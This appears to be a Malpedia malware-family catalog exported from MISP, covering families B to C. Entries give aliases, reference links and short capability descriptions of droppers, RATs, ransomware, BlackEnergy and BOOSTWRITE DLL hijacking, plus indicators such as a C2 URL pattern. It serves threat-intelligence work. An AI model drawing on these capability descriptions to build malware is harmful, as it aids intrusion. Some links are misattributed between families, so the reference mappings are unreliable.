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<td><a href="https://habrahabr.ru/post/213973/">https://habrahabr.ru/post/213973/</a></td>
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<td><a href="https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/">https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/</a></td>
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</table>
**Binanen**

Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command line tools such as (for example) asipconfig, which is useful to retrieve the network configuration. The malware aims to steal information about the machine, the username, installed software and, more generally speaking, it potentially can carry out actions on the compromised machine.

The tag is: `misp-galaxy:malpedia="Binanen"`

Binanen is also known as:

*Table 1424. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen">https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-fleetwood">https://www.secureworks.com/research/threat-profiles/bronze-fleetwood</a></td>
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**BioData**

The tag is: `misp-galaxy:malpedia="BioData"`

BioData is also known as:

*Table 1425. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata">https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/">https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/</a></td>
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**bioload**

The tag is: `misp-galaxy:malpedia="bioload"`

bioload is also known as:

*Table 1426. Table References*

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<td><a href="https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html">https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html</a></td>
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**Biscuit**

The tag is: *misp-galaxy:malpedia="Biscuit"

Biscuit is also known as:

- zxdosml

*Table 1427. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit">https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit</a></td>
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**BISTROMATH**

The tag is: *misp-galaxy:malpedia="BISTROMATH"

BISTROMATH is also known as:

*Table 1428. Table References*

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<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-045a">https://www.us-cert.gov/ncas/analysis-reports/ar20-045a</a></td>
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</table>

**BitPyLock**

BitPyLock is a ransomware that encrypts files by using asymmetric keys and puts '.bitpy' as suffix once the encryption phase ended. The ransom note appears on the affected user’s Desktop with the following name: "# # HELP_TO_DECRYPT_YOUR_FILES # .html". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock.li.

The tag is: *misp-galaxy:malpedia="BitPyLock"

BitPyLock is also known as:

*Table 1429. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock">https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock</a></td>
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<td><a href="https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview">https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview</a></td>
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<td><a href="https://twitter.com/malwrhunterteam/status/1215252402988822529">https://twitter.com/malwrhunterteam/status/1215252402988822529</a></td>
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Bitsran

SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.

The tag is: misp-galaxy:malpedia="Bitsran"

Bitsran is also known as:

- SHADYCAT

Table 1430. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran">https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran</a></td>
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<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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<td><a href="http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html">http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html</a></td>
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Bitter RAT

The tag is: misp-galaxy:malpedia="Bitter RAT"

Bitter RAT is also known as:

Table 1431. Table References

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<tr>
<td><a href="https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan">https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan</a></td>
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</table>

BitRAT

The tag is: misp-galaxy:malpedia="BitRAT"

BitRAT is also known as:

Table 1432. Table References
BKA Trojaner

BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.

The tag is: `misp-galaxy:malpedia="BKA Trojaner"`

BKA Trojaner is also known as:

- bwin3_bka

Table 1433. Table References

BLACKCOFFEE

A backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft’s Technet portal.

The tag is: `misp-galaxy:malpedia="BLACKCOFFEE"`

BLACKCOFFEE is also known as:

- PNGRAT
- ZoxPNG
- gresim

Table 1434. Table References
BlackEnergy

BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.

Version 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to - download and execute a remote file; - execute a local file on the infected computer; - update the bot and its plugins;

The Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.

In 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included: - operations with victim’s filesystem - spreading with a parasitic infector - spying features like keylogging, screenshots or a robust password stealer - Team viewer and a simple pseudo “remote desktop” - listing Windows accounts and scanning network - destroying the system

Typical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.

On 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy
companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.

The tag is: *misp-galaxy:malpedia=*"BlackEnergy"

BlackEnergy is also known as:

**Table 1435. Table References**

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<td><a href="https://threatconnect.com/blog/casting-a-light-on-blackenergy/">https://threatconnect.com/blog/casting-a-light-on-blackenergy/</a></td>
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<td><a href="https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection">https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/iron-viking">https://www.secureworks.com/research/threat-profiles/iron-viking</a></td>
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<td><a href="https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/">https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/</a></td>
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<td><a href="https://marcusedmondson.com/2019/01/18/black-energy-analysis/">https://marcusedmondson.com/2019/01/18/black-energy-analysis/</a></td>
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</table>

**BlackKingdom Ransomware**

The tag is: *misp-galaxy:malpedia=*"BlackKingdom Ransomware"

BlackKingdom Ransomware is also known as:

**Table 1436. Table References**
BlackNET RAT

Advanced and modern Windows botnet with PHP panel developed using VB.NET

The tag is: *misp-galaxy:malpedia="BlackNET RAT"

BlackNET RAT is also known as:

Table 1437. Table References

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<td><a href="https://github.com/BlackHacker511/BlackNET/">https://github.com/BlackHacker511/BlackNET/</a></td>
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<td><a href="https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/">https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/</a></td>
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<td><a href="https://github.com/FarisCode511/BlackNET/">https://github.com/FarisCode511/BlackNET/</a></td>
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BlackNix RAT

The tag is: *misp-galaxy:malpedia="BlackNix RAT"

BlackNix RAT is also known as:

Table 1438. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknix_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknix_rat</a></td>
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<td><a href="https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb">https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb</a></td>
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</table>

BlackPOS

BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials.

The tag is: *misp-galaxy:malpedia="BlackPOS"
BlackPOS is also known as:

- Kaptoxa
- MMon
- POSWDS
- Reedum

**Table 1439. Table References**

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**BlackRemote**

The tag is: *misp-galaxy:malpedia=*BlackRemote*"

BlackRemote is also known as:

- BlackRAT

**Table 1440. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote">https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote</a></td>
</tr>
<tr>
<td><a href="https://news.sophos.com/en-us/2020/05/14/raticate/">https://news.sophos.com/en-us/2020/05/14/raticate/</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/">https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/">https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/</a></td>
</tr>
</tbody>
</table>

**BlackRevolution**

The tag is: *misp-galaxy:malpedia=*BlackRevolution*"

BlackRevolution is also known as:

**Table 1441. Table References**
BlackRouter

The tag is: misp-galaxy:malpedia="BlackRouter"

BlackRouter is also known as:

- BLACKHEART

Table 1442. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution

Blackruby Ransomware

The tag is: misp-galaxy:malpedia="Blackruby Ransomware"

Blackruby Ransomware is also known as:

Table 1443. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby

BlackShades

The tag is: misp-galaxy:malpedia="BlackShades"

BlackShades is also known as:

Table 1444. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades
- https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/
BlackSoul

The tag is: `misp-galaxy:malpedia="BlackSoul"`

BlackSoul is also known as:

Table 1445. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksoul">https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksoul</a></td>
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Blackworm RAT

The tag is: `misp-galaxy:malpedia="Blackworm RAT"`

Blackworm RAT is also known as:

Table 1446. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat</a></td>
</tr>
<tr>
<td><a href="https://github.com/BlackHacker511/BlackWorm">https://github.com/BlackHacker511/BlackWorm</a></td>
</tr>
<tr>
<td><a href="https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/">https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/</a></td>
</tr>
</tbody>
</table>

BLINDINGCAN

According to SentinelOne, this RAT can gather and transmit a defined set of system features, create/terminate/manipulate processes and files, and has self-updating and deletion capability.

The tag is: `misp-galaxy:malpedia="BLINDINGCAN"`

BLINDINGCAN is also known as:

- DRATzarus RAT

Table 1447. Table References
BLINDTOAD

BLINDTOAD is 64-bit Service DLL that loads an encrypted file from disk and executes it in memory.

The tag is: *misp-galaxy:malpedia*="BLINDTOAD"

BLINDTOAD is also known as:

Table 1448. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad">https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad</a></td>
</tr>
<tr>
<td><a href="https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html">https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html</a></td>
</tr>
<tr>
<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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</tbody>
</table>

BLUETHER

The tag is: *misp-galaxy:malpedia*="BLUETHER"

BLUETHER is also known as:

• CAPGELD

Table 1449. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether">https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether</a></td>
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Boaxxe

The tag is: misp-galaxy:malpedia="Boaxxe"

Boaxxe is also known as:

Table 1450. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe">https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe</a></td>
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Bohmini

The tag is: misp-galaxy:malpedia="Bohmini"

Bohmini is also known as:

Table 1451. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini">https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini</a></td>
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Bolek

The tag is: misp-galaxy:malpedia="Bolek"

Bolek is also known as:

- KBOT

Table 1452. Table References

<table>
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<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt">https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt</a></td>
</tr>
</tbody>
</table>

BOOSTWRITE

FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from
it rather than the legitimate DWrite.dll.

The tag is: `misp-galaxy:malpedia="BOOSTWRITE"`

BOOSTWRITE is also known as:

Table 1453. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite">https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite</a></td>
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</tbody>
</table>

**BOOSTWRECK**

BOOSTWRECK is a master boot record wiper malware.

The tag is: `misp-galaxy:malpedia="BOOSTWRECK"`

BOOSTWRECK is also known as:

- MBRkiller

Table 1454. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck">https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck</a></td>
</tr>
<tr>
<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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</table>

**Borr**

The tag is: `misp-galaxy:malpedia="Borr"`

Borr is also known as:

Table 1455. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.borr">https://malpedia.caad.fkie.fraunhofer.de/details/win.borr</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/ViriBack/status/1222704498923032576">https://twitter.com/ViriBack/status/1222704498923032576</a></td>
</tr>
<tr>
<td><a href="https://github.com/onek1lo/Borr-Stealer">https://github.com/onek1lo/Borr-Stealer</a></td>
</tr>
<tr>
<td><a href="https://telegra.ph/Borr-Malware-02-04">https://telegra.ph/Borr-Malware-02-04</a></td>
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Bouncer

The tag is: misp-galaxy:malpedia="Bouncer"

Bouncer is also known as:

Table 1456. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer">https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer</a></td>
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Bozok

The tag is: misp-galaxy:malpedia="Bozok"

Bozok is also known as:

Table 1457. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok">https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html">https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe">https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe</a></td>
</tr>
</tbody>
</table>

BRAIN

The tag is: misp-galaxy:malpedia="BRAIN"

BRAIN is also known as:

Table 1458. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/">https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/</a></td>
</tr>
</tbody>
</table>

Brambul

Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim's networks.

The tag is: misp-galaxy:malpedia="Brambul"
Brambul is also known as:

- SORRYBRUTE

**Table 1459. Table References**

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul">https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ncas/alerts/TA18-149A">https://www.us-cert.gov/ncas/alerts/TA18-149A</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/nickel-academy">https://www.secureworks.com/research/threat-profiles/nickel-academy</a></td>
</tr>
<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/AR18-149A">https://www.us-cert.gov/ncas/analysis-reports/AR18-149A</a></td>
</tr>
<tr>
<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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**BravoNC**

The tag is: *misp-galaxy:malpedia*="BravoNC"

BravoNC is also known as:

**Table 1460. Table References**

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc">https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc</a></td>
</tr>
<tr>
<td><a href="https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group">https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group</a></td>
</tr>
</tbody>
</table>

**BreachRAT**

This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\Work\Breach Remote Administration Tool\Release\Client.pdb

The tag is: *misp-galaxy:malpedia*="BreachRAT"

BreachRAT is also known as:
**Breakthrough**

There is no reference available for this family and all known samples have version 1.0.0.

Pdb-strings in the samples suggest that this is an “exclusive” loader, known as “breakthrough” (maybe), e.g. C:\Users\Exclusiv\Desktop\хп-пробив\Release\build.pdb

The communication url parameters are pretty unique in this combination: gate.php?hwid=<guid>&os=<OS>&build=1.0.0&cpu=8


The tag is: misp-galaxy:malpedia="Breakthrough"

Breakthrough is also known as:

**Bredolab**

The tag is: misp-galaxy:malpedia="Bredolab"

Bredolab is also known as:

**BROLER**

The tag is: misp-galaxy:malpedia="BROLER"

BROLER is also known as:
• down_new

Table 1464. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.broler">https://malpedia.caad.fkie.fraunhofer.de/details/win.broler</a></td>
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</table>

BrushaLoader

The tag is: misp-galaxy:malpedia="BrushaLoader"

BrushaLoader is also known as:

Table 1465. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html">https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html</a></td>
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</table>

BrutPOS

The tag is: misp-galaxy:malpedia="BrutPOS"

BrutPOS is also known as:

Table 1466. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos">https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos</a></td>
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BS2005

The tag is: misp-galaxy:malpedia="BS2005"

BS2005 is also known as:

Table 1467. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005">https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005</a></td>
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</table>
BTCWare

The tag is: `misp-galaxy:malpedia="BTCWare"`

BTCWare is also known as:

Table 1468. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware">https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware</a></td>
</tr>
</tbody>
</table>

BUBBLEWRAP

BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.

The tag is: `misp-galaxy:malpedia="BUBBLEWRAP"`

BUBBLEWRAP is also known as:

Table 1469. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap">https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></td>
</tr>
<tr>
<td><a href="https://attack.mitre.org/software/S0043/">https://attack.mitre.org/software/S0043/</a></td>
</tr>
</tbody>
</table>

Buer

Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.

The tag is: `misp-galaxy:malpedia="Buer"`

Buer is also known as:
• Buerloader

Table 1470. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.buer">https://malpedia.caad.fkie.fraunhofer.de/details/win.buer</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<tr>
<td><a href="https://blog.minerva-labs.com/Stopping-buerloader">https://blog.minerva-labs.com/Stopping-buerloader</a></td>
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<td><a href="https://twitter.com/StopMalvertisin/status/1182505434231398401">https://twitter.com/StopMalvertisin/status/1182505434231398401</a></td>
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<td><a href="https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/">https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/</a></td>
</tr>
<tr>
<td><a href="https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/">https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/</a></td>
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<td><a href="https://twitter.com/SophosLabs/status/1321844306970251265">https://twitter.com/SophosLabs/status/1321844306970251265</a></td>
</tr>
<tr>
<td><a href="https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/">https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/</a></td>
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BUFFETLINE

The tag is: *misp-galaxy:malpedia*="BUFFETLINE"

BUFFETLINE is also known as:

Table 1471. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.buffetline">https://malpedia.caad.fkie.fraunhofer.de/details/win.buffetline</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-045f">https://www.us-cert.gov/ncas/analysis-reports/ar20-045f</a></td>
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</tbody>
</table>

Buhtrap

The tag is: *misp-galaxy:malpedia*="Buhtrap"
Buhtrap is also known as:

- Ratopak

**Table 1472. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap">https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap</a></td>
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<td><a href="https://malware-research.org/carbanak-source-code-leaked/">https://malware-research.org/carbanak-source-code-leaked/</a></td>
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<td><a href="https://www.welivesecurity.com/2015/04/09/operation-buhtrap/">https://www.welivesecurity.com/2015/04/09/operation-buhtrap/</a></td>
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<td><a href="https://www.scythe.io/library/threatthursday-buhtrap">https://www.scythe.io/library/threatthursday-buhtrap</a></td>
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<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-454f0f6de6&amp;CommunityKey=1ecf5f55-9545-44d6-9b0f4-4ea7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-454f0f6de6&amp;CommunityKey=1ecf5f55-9545-44d6-9b0f4-4ea7f5f5e68&amp;tab=librarydocuments</a></td>
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<td><a href="https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/">https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/</a></td>
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<tr>
<td><a href="https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code">https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code</a></td>
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<tr>
<td><a href="https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/">https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/</a></td>
</tr>
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</table>

**Bundestrojaner**

The tag is: *misp-galaxy:malpedia="Bundestrojaner"*

Bundestrojaner is also known as:

- 0zapftis
- R2D2

**Table 1473. Table References**

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner">https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner</a></td>
</tr>
</tbody>
</table>
**Bunitu**

Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g. VIP72).

The tag is: `misp-galaxy:malpedia="Bunitu"`

Bunitu is also known as:

**Table 1474. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu">https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu</a></td>
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<td><a href="https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/">https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/</a></td>
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<td><a href="http://malware-traffic-analysis.net/2017/05/09/index.html">http://malware-traffic-analysis.net/2017/05/09/index.html</a></td>
</tr>
<tr>
<td><a href="https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/">https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/</a></td>
</tr>
<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/">https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/</a></td>
</tr>
</tbody>
</table>

**Buterat**

The tag is: `misp-galaxy:malpedia="Buterat"`

Buterat is also known as:

- spyvoltar

**Table 1475. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.butera">https://malpedia.caad.fkie.fraunhofer.de/details/win.butera</a></td>
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**Buzus**

The tag is: `misp-galaxy:malpedia="Buzus"`

Buzus is also known as:

- Yimfoca

**Table 1476. Table References**
**BYEBY**

The tag is: *misp-galaxy:malpedia="BYEBY"*

BYEBY is also known as:

*Table 1477. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus">https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus</a></td>
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**c0d0so0**

The tag is: *misp-galaxy:malpedia="c0d0so0"*

c0d0so0 is also known as:

*Table 1478. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0">https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/">https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/</a></td>
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**CabArt**

The tag is: *misp-galaxy:malpedia="CabArt"*

CabArt is also known as:

*Table 1479. Table References*

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart">https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart</a></td>
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**CadelSpy**

The tag is: `misp-galaxy:malpedia="CadelSpy"`

CadelSpy is also known as:

